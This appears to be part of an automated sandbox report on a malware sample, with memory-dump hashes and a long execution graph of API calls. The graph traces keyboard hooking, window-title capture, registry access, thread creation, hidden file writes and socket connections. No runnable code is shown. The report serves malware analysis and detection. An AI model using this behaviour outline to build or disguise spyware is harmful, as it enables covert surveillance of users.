                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0394dea9e6bf9ba6aa4c8e61297d1b3d059b5159137257fe85759cc350b1c7b1
                                                  • Instruction ID: bce7ff83f156a3086732c2bcaae3f7e94c98e7e987124def11e1685fec81a6fa
                                                  • Opcode Fuzzy Hash: 0394dea9e6bf9ba6aa4c8e61297d1b3d059b5159137257fe85759cc350b1c7b1
                                                  • Instruction Fuzzy Hash: 365158B5A04254AFCB04CFA9D5849ADFBF1FF88310F15855AE858AB312D731ED81CB91
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 35d0bb2890a332409adafaa30087991bd2ed5cac27fded4ae702da86d323413f
                                                  • Instruction ID: ffc9ba43ce92dc0e3ad07a12d2b20343bc5eb7bd937a4734c78cde9614920225
                                                  • Opcode Fuzzy Hash: 35d0bb2890a332409adafaa30087991bd2ed5cac27fded4ae702da86d323413f
                                                  • Instruction Fuzzy Hash: 8D411874A00509DFCB05CF5AC5949BAFBB5FF88310B158699D515AB364C732FC90CBA0
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b4269814fcd1487f1e35d24f22d3291649b4996755a5b1fcca760802ef40fc0
                                                  • Instruction ID: a6feea28d5d79cbfe7b67bfa31046ce629beb2915963ab7beb757f2a80d03215
                                                  • Opcode Fuzzy Hash: 0b4269814fcd1487f1e35d24f22d3291649b4996755a5b1fcca760802ef40fc0
                                                  • Instruction Fuzzy Hash: 86410B34A00209EFDB04CFA9D494AADFBF2BF88310F248555E815AB365C735EC86CB90
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c6c656b75fe9388f14d4c0fc8ec5609e10c0447590b3682fc7f193c145b971da
                                                  • Instruction ID: fb56834fd5b882bcca31eaf3f732d9663154d9aca774e52453a077433059248b
                                                  • Opcode Fuzzy Hash: c6c656b75fe9388f14d4c0fc8ec5609e10c0447590b3682fc7f193c145b971da
                                                  • Instruction Fuzzy Hash: 27111930A04208AFCB05CBA8D494AADFBF5AF88300F24C555E815AB361C775ED86CB90
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2254499195.000000000318D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0318D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_318d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2ee9a2d4dda0c1822824e1377c7d53e2e82fa48b4f3fc2e8196a04962a0e9ff5
                                                  • Instruction ID: fd2574aedf7e8f0c3705231bec40d09af0a196071d1e1577cae0db0979355939
                                                  • Opcode Fuzzy Hash: 2ee9a2d4dda0c1822824e1377c7d53e2e82fa48b4f3fc2e8196a04962a0e9ff5
                                                  • Instruction Fuzzy Hash: D301D4314043449BD720EB15ED84B67BF9CEF49324F18C469ED480A286C7799841CEB9
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2254499195.000000000318D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0318D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_318d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 88a605e2aec9583e9491935e45b81f328c7ca19defa64faabcc3a935572a64db
                                                  • Instruction ID: aefe89704811aa812f0f6abfd738a32d6205d5e496830f2aaba3409b67b1f984
                                                  • Opcode Fuzzy Hash: 88a605e2aec9583e9491935e45b81f328c7ca19defa64faabcc3a935572a64db
                                                  • Instruction Fuzzy Hash: B001407140E3C49FD7128B259C94B52BFB8EF57224F1D80DBD9888F2A7C2699844CB76
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: af1cbe016bd542b93da532b7a5199c7624233c105b4ce132edd3b8974ccb7b3b
                                                  • Instruction ID: 8d3cc7862c1bc5ccc0a5235ff7f0b09999155629a7241d6e875e8340bb62e8bb
                                                  • Opcode Fuzzy Hash: af1cbe016bd542b93da532b7a5199c7624233c105b4ce132edd3b8974ccb7b3b
                                                  • Instruction Fuzzy Hash: 6CF01C70E02208EFCB45DFA9D5412DDBBF0FF44305F5080AAD82896641E73A5951DF81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2283191494.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7970000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q$$]q$$]q
                                                  • API String ID: 0-978391646
                                                  • Opcode ID: ad12947ee3a7b83f154a5ec8db1dadfe0cbfe5a26d96d4b8870eba8d4560e9fb
                                                  • Instruction ID: 10ac2a9d4b30e7ad880505083932bae0961ebb8d05ebf5fb6cc9f94a7fb8ad85
                                                  • Opcode Fuzzy Hash: ad12947ee3a7b83f154a5ec8db1dadfe0cbfe5a26d96d4b8870eba8d4560e9fb
                                                  • Instruction Fuzzy Hash: 9A01D671B0E3854FC72E122D1C305696FBAAFC392532A44EBC080DF297C95A4C45C3A6

                                                  Execution Graph

                                                  Execution Coverage:3.4%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:5.1%
                                                  Total number of Nodes:1241
                                                  Total number of Limit Nodes:49
Execution graph (rendered node/edge graph omitted; the serialised node list is not reproduced here). Recoverable content: the graph spans functions at addresses 0x40xxxx-0x45xxxx. It begins with CRT start-up (the __scrt_* helpers, GetStartupInfoW, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetModuleHandleW, EnterCriticalSection/LeaveCriticalSection, RtlAllocateHeap, GetStdHandle/GetFileType) and then reaches a function at 0x40ea00 that resolves imports via LoadLibraryA/GetProcAddress (one node also uses GetModuleHandleA), calls GetModuleFileNameW and FindResourceA, touches the registry (RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExA, RegCreateKeyA, RegCloseKey), spawns a process with CreateProcessA followed by CloseHandle, starts several threads with CreateThread, calls SetProcessDEPPolicy, collects GetComputerNameExW and GetUserNameW, uses StrToIntA, and ends in a DeleteFileW/Sleep loop (nodes 47623-47626).
API calls 47763->48219 47765->47368 47768 4020df 11 API calls 47767->47768 47769 40532a 47768->47769 48220 4032a0 47769->48220 47771 405346 47771->47376 48224 4051ef 47772->48224 47774 406391 48228 402055 47774->48228 47777 401fe2 47778 401ff1 47777->47778 47785 402039 47777->47785 47779 4023ce 11 API calls 47778->47779 47780 401ffa 47779->47780 47781 402015 47780->47781 47782 40203c 47780->47782 48260 403098 28 API calls 47781->48260 47783 40267a 11 API calls 47782->47783 47783->47785 47786 401fd8 47785->47786 47787 4023ce 11 API calls 47786->47787 47788 401fe1 47787->47788 47788->47389 47790 401fd2 47789->47790 47791 401fc9 47789->47791 47790->47394 48261 4025e0 28 API calls 47791->48261 48262 401fab 47793->48262 47795 40d0ae CreateMutexA GetLastError 47795->47410 48263 41c048 47796->48263 47801 401fe2 28 API calls 47802 41b390 47801->47802 47803 401fd8 11 API calls 47802->47803 47804 41b398 47803->47804 47805 4135e1 31 API calls 47804->47805 47807 41b3ee 47804->47807 47806 41b3c1 47805->47806 47808 41b3cc StrToIntA 47806->47808 47807->47416 47809 41b3e3 47808->47809 47810 41b3da 47808->47810 47811 401fd8 11 API calls 47809->47811 48271 41cffa 22 API calls 47810->48271 47811->47807 47814 407765 47813->47814 47815 413584 3 API calls 47814->47815 47816 40776c 47815->47816 47816->47427 47816->47428 47818 41bd03 47817->47818 48272 40b93f 47818->48272 47820 41bd0b 47820->47444 47822 401f22 47821->47822 47829 401f6a 47821->47829 47823 402252 11 API calls 47822->47823 47824 401f2b 47823->47824 47825 401f6d 47824->47825 47827 401f46 47824->47827 48305 402336 47825->48305 48304 40305c 28 API calls 47827->48304 47830 401f09 47829->47830 47831 402252 11 API calls 47830->47831 47832 401f12 47831->47832 47832->47456 47834 4139a0 47833->47834 47835 406e13 28 API calls 47834->47835 47836 4139b5 47835->47836 47837 4020f6 28 API calls 47836->47837 47838 4139c5 47837->47838 47839 4137aa 14 API calls 47838->47839 47840 4139cf 47839->47840 47841 401fd8 11 API calls 47840->47841 
47842 4139dc 47841->47842 47842->47506 47844 40209b 47843->47844 47845 4023ce 11 API calls 47844->47845 47846 4020a6 47845->47846 48309 4024ed 47846->48309 47850 4137fa 47849->47850 47852 4137c3 47849->47852 47851 401fd8 11 API calls 47850->47851 47853 40efd9 47851->47853 47854 4137d5 RegSetValueExA RegCloseKey 47852->47854 47853->47507 47854->47850 47856 43bb45 _strftime 47855->47856 48313 43ae83 47856->48313 47858 40eff2 47858->47514 47858->47515 47860 41b631 47859->47860 47861 41b596 GetLocalTime 47859->47861 47862 401fd8 11 API calls 47860->47862 47863 40531e 28 API calls 47861->47863 47864 41b639 47862->47864 47865 41b5d8 47863->47865 47866 401fd8 11 API calls 47864->47866 47867 406383 28 API calls 47865->47867 47868 40f048 47866->47868 47869 41b5e4 47867->47869 47868->47531 48341 402f10 47869->48341 47872 406383 28 API calls 47873 41b5fc 47872->47873 48346 40723b 77 API calls 47873->48346 47875 41b60a 47876 401fd8 11 API calls 47875->47876 47877 41b616 47876->47877 47878 401fd8 11 API calls 47877->47878 47879 41b61f 47878->47879 47880 401fd8 11 API calls 47879->47880 47881 41b628 47880->47881 47882 401fd8 11 API calls 47881->47882 47882->47860 47884 409e3d _wcslen 47883->47884 47885 409e48 47884->47885 47886 409e5f 47884->47886 47887 40da6f 31 API calls 47885->47887 47888 40da6f 31 API calls 47886->47888 47890 409e50 47887->47890 47889 409e67 47888->47889 47891 401f13 28 API calls 47889->47891 47892 401f13 28 API calls 47890->47892 47893 409e75 47891->47893 47894 409e5a 47892->47894 47895 401f09 11 API calls 47893->47895 47897 401f09 11 API calls 47894->47897 47896 409e7d 47895->47896 48365 409196 28 API calls 47896->48365 47899 409eb4 47897->47899 48350 40a144 47899->48350 47901 409e8f 48366 403014 47901->48366 47905 401f13 28 API calls 47906 409ea4 47905->47906 47907 401f09 11 API calls 47906->47907 47907->47894 48558 40417e 47908->48558 47913 403014 28 API calls 47914 41b703 47913->47914 47915 401f09 11 API calls 47914->47915 47916 41b70c 47915->47916 
47917 401f09 11 API calls 47916->47917 47918 40f25e 47917->47918 47918->47584 47920 41355b RegQueryValueExA RegCloseKey 47919->47920 47921 40f31f 47919->47921 47920->47921 47921->47457 47921->47612 47923 413a7a RegDeleteValueW 47922->47923 47924 40f3cd 47922->47924 47923->47924 47924->47451 47926 40dd96 47925->47926 47927 41353a 3 API calls 47926->47927 47928 40dd9d 47927->47928 47929 40ddbc 47928->47929 48652 401707 47928->48652 47933 414f65 47929->47933 47931 40ddaa 48655 4138b2 RegCreateKeyA 47931->48655 47934 4020df 11 API calls 47933->47934 47935 414f79 47934->47935 48669 41b944 47935->48669 47938 4020df 11 API calls 47939 414f8f 47938->47939 47940 401e65 22 API calls 47939->47940 47941 414f9d 47940->47941 47942 43bb2c _strftime 40 API calls 47941->47942 47943 414faa 47942->47943 47944 414fbc 47943->47944 47945 414faf Sleep 47943->47945 47946 402093 28 API calls 47944->47946 47945->47944 47947 414fcb 47946->47947 47948 401e65 22 API calls 47947->47948 47949 414fd4 47948->47949 47950 4020f6 28 API calls 47949->47950 47951 414fdf 47950->47951 47952 41beac 28 API calls 47951->47952 47953 414fe7 47952->47953 48673 40489e WSAStartup 47953->48673 47955 414ff1 47956 401e65 22 API calls 47955->47956 47957 414ffa 47956->47957 47958 401e65 22 API calls 47957->47958 47983 415079 47957->47983 47959 415013 47958->47959 47960 401e65 22 API calls 47959->47960 47961 415024 47960->47961 47964 401e65 22 API calls 47961->47964 47962 41beac 28 API calls 47962->47983 47963 401e65 22 API calls 47963->47983 47965 415035 47964->47965 47966 401e65 22 API calls 47965->47966 47968 415046 47966->47968 47967 406c59 28 API calls 47967->47983 47969 401e65 22 API calls 47968->47969 47971 415057 47969->47971 47970 401fe2 28 API calls 47970->47983 47972 401e65 22 API calls 47971->47972 47973 415069 47972->47973 48775 40473d 89 API calls 47973->48775 47975 402093 28 API calls 47975->47983 47976 41b580 80 API calls 47976->47983 47978 4151c7 WSAGetLastError 48776 41cb72 30 API calls 47978->48776 
47983->47962 47983->47963 47983->47967 47983->47970 47983->47975 47983->47976 47983->47978 47986 40531e 28 API calls 47983->47986 47987 401e8d 11 API calls 47983->47987 47988 402f10 28 API calls 47983->47988 47989 43bb2c _strftime 40 API calls 47983->47989 47991 406383 28 API calls 47983->47991 47992 401fd8 11 API calls 47983->47992 47994 409097 28 API calls 47983->47994 47996 4020f6 28 API calls 47983->47996 47998 4135e1 31 API calls 47983->47998 48002 4153f6 47983->48002 48674 414f24 47983->48674 48679 40482d 47983->48679 48686 404f51 47983->48686 48701 4048c8 connect 47983->48701 48761 404e26 WaitForSingleObject 47983->48761 48777 4052fd 28 API calls 47983->48777 48778 4145f8 51 API calls 47983->48778 48779 441ed1 20 API calls 47983->48779 48780 413733 RegOpenKeyExA RegQueryValueExA RegCloseKey 47983->48780 47986->47983 47987->47983 47988->47983 47990 415b0a Sleep 47989->47990 47990->47983 47991->47983 47992->47983 47994->47983 47996->47983 47998->47983 47999 40417e 28 API calls 47999->48002 48002->47983 48002->47999 48003 401e65 22 API calls 48002->48003 48007 41bc1f 28 API calls 48002->48007 48009 41bdaf 28 API calls 48002->48009 48012 406383 28 API calls 48002->48012 48013 402f10 28 API calls 48002->48013 48014 402ea1 28 API calls 48002->48014 48016 401fd8 11 API calls 48002->48016 48017 401f09 11 API calls 48002->48017 48020 402093 28 API calls 48002->48020 48021 41b580 80 API calls 48002->48021 48022 415aac CreateThread 48002->48022 48781 40ddc4 6 API calls 48002->48781 48782 41bcd3 28 API calls 48002->48782 48784 41bb77 GetTickCount 48002->48784 48785 41bb27 30 API calls ___scrt_fastfail 48002->48785 48786 40f90c 29 API calls 48002->48786 48787 402f31 28 API calls 48002->48787 48788 404aa1 61 API calls ctype 48002->48788 48789 404c10 113 API calls _Yarn 48002->48789 48790 40b08c 85 API calls 48002->48790 48004 415474 GetTickCount 48003->48004 48783 41bc1f 28 API calls 48004->48783 48007->48002 48009->48002 48012->48002 48013->48002 48014->48002 
48016->48002 48017->48002 48020->48002 48021->48002 48022->48002 48815 41ada8 105 API calls 48022->48815 48023->47369 48024->47377 48025->47381 48028 4020df 11 API calls 48027->48028 48029 406c65 48028->48029 48030 4032a0 28 API calls 48029->48030 48031 406c82 48030->48031 48031->47402 48033 40ebdf 48032->48033 48034 4135ae RegQueryValueExA RegCloseKey 48032->48034 48033->47399 48033->47417 48034->48033 48035->47407 48036->47436 48037->47427 48038->47419 48039->47435 48041 401f86 11 API calls 48040->48041 48042 40da8b 48041->48042 48043 40dae0 48042->48043 48044 40daab 48042->48044 48045 40daa1 48042->48045 48048 41c048 GetCurrentProcess 48043->48048 48816 41b645 29 API calls 48044->48816 48047 40dbd4 GetLongPathNameW 48045->48047 48051 40417e 28 API calls 48047->48051 48049 40dae5 48048->48049 48052 40dae9 48049->48052 48053 40db3b 48049->48053 48050 40dab4 48054 401f13 28 API calls 48050->48054 48055 40dbe9 48051->48055 48057 40417e 28 API calls 48052->48057 48056 40417e 28 API calls 48053->48056 48093 40dabe 48054->48093 48058 40417e 28 API calls 48055->48058 48060 40db49 48056->48060 48061 40daf7 48057->48061 48059 40dbf8 48058->48059 48819 40de0c 28 API calls 48059->48819 48066 40417e 28 API calls 48060->48066 48067 40417e 28 API calls 48061->48067 48063 401f09 11 API calls 48063->48045 48064 40dc0b 48820 402fa5 28 API calls 48064->48820 48069 40db5f 48066->48069 48070 40db0d 48067->48070 48068 40dc16 48821 402fa5 28 API calls 48068->48821 48818 402fa5 28 API calls 48069->48818 48817 402fa5 28 API calls 48070->48817 48074 40dc20 48077 401f09 11 API calls 48074->48077 48075 40db6a 48078 401f13 28 API calls 48075->48078 48076 40db18 48079 401f13 28 API calls 48076->48079 48080 40dc2a 48077->48080 48081 40db75 48078->48081 48082 40db23 48079->48082 48083 401f09 11 API calls 48080->48083 48084 401f09 11 API calls 48081->48084 48085 401f09 11 API calls 48082->48085 48086 40dc33 48083->48086 48087 40db7e 48084->48087 48088 40db2c 48085->48088 48089 401f09 11 API 
calls 48086->48089 48090 401f09 11 API calls 48087->48090 48091 401f09 11 API calls 48088->48091 48092 40dc3c 48089->48092 48090->48093 48091->48093 48094 401f09 11 API calls 48092->48094 48093->48063 48095 40dc45 48094->48095 48096 401f09 11 API calls 48095->48096 48097 40dc4e 48096->48097 48097->47493 48098->47504 48099->47527 48100->47486 48101->47519 48104 434563 48102->48104 48103 43bda0 _Yarn 21 API calls 48103->48104 48104->48103 48105 40f10c 48104->48105 48822 443001 7 API calls 2 library calls 48104->48822 48823 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48104->48823 48824 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48104->48824 48105->47557 48109->47588 48110->47576 48112->47621 48113->47426 48116 41b556 LoadResource LockResource SizeofResource 48115->48116 48117 40f419 48115->48117 48116->48117 48118 43bda0 48117->48118 48123 4461b8 ___crtLCMapStringA 48118->48123 48119 4461f6 48135 44062d 20 API calls _Atexit 48119->48135 48121 4461e1 RtlAllocateHeap 48122 4461f4 48121->48122 48121->48123 48122->47713 48123->48119 48123->48121 48134 443001 7 API calls 2 library calls 48123->48134 48126 4020bf 48125->48126 48136 4023ce 48126->48136 48128 4020ca 48140 40250a 48128->48140 48130 4020d9 48130->47716 48132 4020b7 28 API calls 48131->48132 48133 406e27 48132->48133 48133->47723 48134->48123 48135->48122 48137 402428 48136->48137 48138 4023d8 48136->48138 48137->48128 48138->48137 48147 4027a7 11 API calls std::_Deallocate 48138->48147 48141 40251a 48140->48141 48142 402520 48141->48142 48143 402535 48141->48143 48148 402569 48142->48148 48158 4028e8 48143->48158 48146 402533 48146->48130 48147->48137 48169 402888 48148->48169 48150 40257d 48151 402592 48150->48151 48152 4025a7 48150->48152 48174 402a34 22 API calls 48151->48174 48154 4028e8 28 API calls 48152->48154 48157 4025a5 48154->48157 48155 40259b 48175 4029da 22 API calls 48155->48175 48157->48146 48159 4028f1 48158->48159 48160 402953 
48159->48160 48161 4028fb 48159->48161 48183 4028a4 22 API calls 48160->48183 48165 402904 48161->48165 48166 402917 48161->48166 48164 402915 48164->48146 48177 402cae 48165->48177 48166->48164 48168 4023ce 11 API calls 48166->48168 48168->48164 48170 402890 48169->48170 48171 402898 48170->48171 48176 402ca3 22 API calls 48170->48176 48171->48150 48174->48155 48175->48157 48178 402cb8 __EH_prolog 48177->48178 48184 402e54 22 API calls 48178->48184 48180 4023ce 11 API calls 48181 402d92 48180->48181 48181->48164 48182 402d24 48182->48180 48184->48182 48186 4020e7 48185->48186 48187 4023ce 11 API calls 48186->48187 48188 4020f2 48187->48188 48188->47751 48189->47751 48191 41ced2 48190->48191 48192 41cf31 48191->48192 48196 41cee2 48191->48196 48193 41cf4b 48192->48193 48207 41d071 28 API calls 48192->48207 48195 41d1d7 28 API calls 48193->48195 48198 41cf2d 48195->48198 48197 41cf1a 48196->48197 48202 41d071 28 API calls 48196->48202 48203 41d1d7 48197->48203 48198->47751 48201->47740 48202->48197 48204 41d1e0 48203->48204 48208 41d283 48204->48208 48207->48193 48209 41d28c 48208->48209 48212 41d331 48209->48212 48214 41d33c 48212->48214 48213 41d1ea 48213->48198 48214->48213 48215 4020f6 28 API calls 48214->48215 48215->48213 48216->47755 48217->47759 48218->47761 48222 4032aa 48220->48222 48221 4032c9 48221->47771 48222->48221 48223 4028e8 28 API calls 48222->48223 48223->48221 48225 4051fb 48224->48225 48234 405274 48225->48234 48227 405208 48227->47774 48229 402061 48228->48229 48230 4023ce 11 API calls 48229->48230 48231 40207b 48230->48231 48256 40267a 48231->48256 48235 405282 48234->48235 48236 405288 48235->48236 48237 40529e 48235->48237 48245 4025f0 48236->48245 48239 4052f5 48237->48239 48240 4052b6 48237->48240 48254 4028a4 22 API calls 48239->48254 48243 4028e8 28 API calls 48240->48243 48244 40529c 48240->48244 48243->48244 48244->48227 48246 402888 22 API calls 48245->48246 48247 402602 48246->48247 48248 402672 48247->48248 48249 402629 
48247->48249 48255 4028a4 22 API calls 48248->48255 48252 4028e8 28 API calls 48249->48252 48253 40263b 48249->48253 48252->48253 48253->48244 48257 40268b 48256->48257 48258 4023ce 11 API calls 48257->48258 48259 40208d 48258->48259 48259->47777 48260->47785 48261->47790 48264 41b362 48263->48264 48265 41c055 GetCurrentProcess 48263->48265 48266 4135e1 RegOpenKeyExA 48264->48266 48265->48264 48267 41360f RegQueryValueExA RegCloseKey 48266->48267 48268 413639 48266->48268 48267->48268 48269 402093 28 API calls 48268->48269 48270 41364e 48269->48270 48270->47801 48271->47809 48273 40b947 48272->48273 48278 402252 48273->48278 48275 40b952 48282 40b967 48275->48282 48277 40b961 48277->47820 48279 4022ac 48278->48279 48280 40225c 48278->48280 48279->48275 48280->48279 48289 402779 11 API calls std::_Deallocate 48280->48289 48283 40b9a1 48282->48283 48284 40b973 48282->48284 48301 4028a4 22 API calls 48283->48301 48290 4027e6 48284->48290 48288 40b97d 48288->48277 48289->48279 48291 4027ef 48290->48291 48292 402851 48291->48292 48293 4027f9 48291->48293 48303 4028a4 22 API calls 48292->48303 48296 402802 48293->48296 48298 402815 48293->48298 48302 402aea 28 API calls __EH_prolog 48296->48302 48299 402813 48298->48299 48300 402252 11 API calls 48298->48300 48299->48288 48300->48299 48302->48299 48304->47829 48306 402347 48305->48306 48307 402252 11 API calls 48306->48307 48308 4023c7 48307->48308 48308->47829 48310 4024f9 48309->48310 48311 40250a 28 API calls 48310->48311 48312 4020b1 48311->48312 48312->47498 48329 43ba8a 48313->48329 48315 43aed0 48335 43a837 36 API calls 3 library calls 48315->48335 48317 43ae95 48317->48315 48318 43aeaa 48317->48318 48328 43aeaf ___std_exception_copy 48317->48328 48334 44062d 20 API calls _Atexit 48318->48334 48321 43aedc 48322 43af0b 48321->48322 48336 43bacf 40 API calls __Tolower 48321->48336 48325 43af77 48322->48325 48337 43ba36 20 API calls 2 library calls 48322->48337 48338 43ba36 20 API calls 2 library calls 48325->48338 
48326 43b03e _strftime 48326->48328 48339 44062d 20 API calls _Atexit 48326->48339 48328->47858 48330 43baa2 48329->48330 48331 43ba8f 48329->48331 48330->48317 48340 44062d 20 API calls _Atexit 48331->48340 48333 43ba94 ___std_exception_copy 48333->48317 48334->48328 48335->48321 48336->48321 48337->48325 48338->48326 48339->48328 48340->48333 48347 401fb0 48341->48347 48343 402f1e 48344 402055 11 API calls 48343->48344 48345 402f2d 48344->48345 48345->47872 48346->47875 48348 4025f0 28 API calls 48347->48348 48349 401fbd 48348->48349 48349->48343 48351 40a162 48350->48351 48352 413584 3 API calls 48351->48352 48353 40a169 48352->48353 48354 40a197 48353->48354 48355 40a17d 48353->48355 48371 409097 48354->48371 48357 40a182 48355->48357 48358 409ed6 48355->48358 48360 409097 28 API calls 48357->48360 48358->47550 48362 40a190 48360->48362 48399 40a268 29 API calls 48362->48399 48364 40a195 48364->48358 48365->47901 48535 403222 48366->48535 48368 403022 48539 403262 48368->48539 48372 4090ad 48371->48372 48373 402252 11 API calls 48372->48373 48374 4090c7 48373->48374 48400 404267 48374->48400 48376 4090d5 48377 40a1b4 48376->48377 48412 40b927 48377->48412 48380 40a205 48382 402093 28 API calls 48380->48382 48381 40a1dd 48383 402093 28 API calls 48381->48383 48384 40a210 48382->48384 48385 40a1e7 48383->48385 48386 402093 28 API calls 48384->48386 48387 41bcef 28 API calls 48385->48387 48388 40a21f 48386->48388 48389 40a1f5 48387->48389 48390 41b580 80 API calls 48388->48390 48416 40b19f 31 API calls _Yarn 48389->48416 48393 40a224 CreateThread 48390->48393 48392 40a1fc 48394 401fd8 11 API calls 48392->48394 48395 40a24b CreateThread 48393->48395 48396 40a23f CreateThread 48393->48396 48424 40a2b8 48393->48424 48394->48380 48397 401f09 11 API calls 48395->48397 48421 40a2c4 48395->48421 48396->48395 48418 40a2a2 48396->48418 48398 40a25f 48397->48398 48398->48358 48399->48364 48534 40a2ae 163 API calls 48399->48534 48401 402888 22 API calls 48400->48401 48402 
40427b 48401->48402 48403 404290 48402->48403 48404 4042a5 48402->48404 48410 4042df 22 API calls 48403->48410 48405 4027e6 28 API calls 48404->48405 48409 4042a3 48405->48409 48407 404299 48411 402c48 22 API calls 48407->48411 48409->48376 48410->48407 48411->48409 48413 40b930 48412->48413 48414 40a1d2 48412->48414 48417 40b9a7 28 API calls 48413->48417 48414->48380 48414->48381 48416->48392 48417->48414 48427 40a2f3 48418->48427 48444 40ad11 48421->48444 48487 40a761 48424->48487 48428 40a30c GetModuleHandleA SetWindowsHookExA 48427->48428 48429 40a36e GetMessageA 48427->48429 48428->48429 48431 40a328 GetLastError 48428->48431 48430 40a380 TranslateMessage DispatchMessageA 48429->48430 48432 40a2ab 48429->48432 48430->48429 48430->48432 48442 41bc1f 28 API calls 48431->48442 48434 40a339 48443 4052fd 28 API calls 48434->48443 48442->48434 48451 40ad1f 48444->48451 48445 40a2cd 48446 40ad79 Sleep GetForegroundWindow GetWindowTextLengthW 48447 40b93f 28 API calls 48446->48447 48447->48451 48451->48445 48451->48446 48454 40adbf GetWindowTextW 48451->48454 48472 40add9 48451->48472 48474 43445a EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 48451->48474 48475 401f86 48451->48475 48479 434801 23 API calls __onexit 48451->48479 48480 43441b SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 48451->48480 48453 41bb77 GetTickCount 48453->48472 48454->48451 48456 401f09 11 API calls 48456->48472 48457 40b927 28 API calls 48457->48472 48458 40af17 48459 401f09 11 API calls 48458->48459 48459->48445 48460 40ae84 Sleep 48460->48472 48463 402093 28 API calls 48463->48472 48465 409097 28 API calls 48465->48472 48467 406383 28 API calls 48467->48472 48469 403014 28 API calls 48469->48472 48470 40a671 12 API calls 48470->48472 48471 41bcef 28 API calls 48471->48472 48472->48451 48472->48453 48472->48456 48472->48457 48472->48458 48472->48460 48472->48463 48472->48465 48472->48467 
48472->48469 48472->48470 48472->48471 48473 401fd8 11 API calls 48472->48473 48481 40907f 28 API calls 48472->48481 48482 40b19f 31 API calls _Yarn 48472->48482 48483 40b9b7 28 API calls 48472->48483 48484 40b783 40 API calls 2 library calls 48472->48484 48485 441ed1 20 API calls 48472->48485 48486 4052fd 28 API calls 48472->48486 48473->48472 48476 401f8e 48475->48476 48477 402252 11 API calls 48476->48477 48478 401f99 48477->48478 48478->48451 48479->48451 48480->48451 48481->48472 48482->48472 48483->48472 48484->48472 48485->48472 48488 40a776 Sleep 48487->48488 48508 40a6b0 48488->48508 48490 40a2c1 48491 40a7c7 GetFileAttributesW 48495 40a788 48491->48495 48492 40a7b6 CreateDirectoryW 48492->48495 48493 40a7de SetFileAttributesW 48493->48495 48495->48488 48495->48490 48495->48491 48495->48492 48495->48493 48497 401e65 22 API calls 48495->48497 48499 40a829 48495->48499 48521 41c482 48495->48521 48496 40a858 PathFileExistsW 48496->48499 48497->48495 48498 4020df 11 API calls 48498->48499 48499->48496 48499->48498 48501 4020b7 28 API calls 48499->48501 48502 40a961 SetFileAttributesW 48499->48502 48503 401fd8 11 API calls 48499->48503 48504 401fe2 28 API calls 48499->48504 48505 406e13 28 API calls 48499->48505 48507 401fd8 11 API calls 48499->48507 48531 41c516 32 API calls 48499->48531 48532 41c583 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48499->48532 48501->48499 48502->48495 48503->48499 48504->48499 48505->48499 48507->48495 48509 40a75d 48508->48509 48511 40a6c6 48508->48511 48509->48495 48510 40a6e5 CreateFileW 48510->48511 48512 40a6f3 GetFileSize 48510->48512 48511->48510 48513 40a728 CloseHandle 48511->48513 48514 40a73a 48511->48514 48515 40a716 48511->48515 48516 40a71d Sleep 48511->48516 48512->48511 48512->48513 48513->48511 48514->48509 48518 409097 28 API calls 48514->48518 48533 40b117 84 API calls 48515->48533 48516->48513 48519 40a756 48518->48519 48520 40a1b4 124 API calls 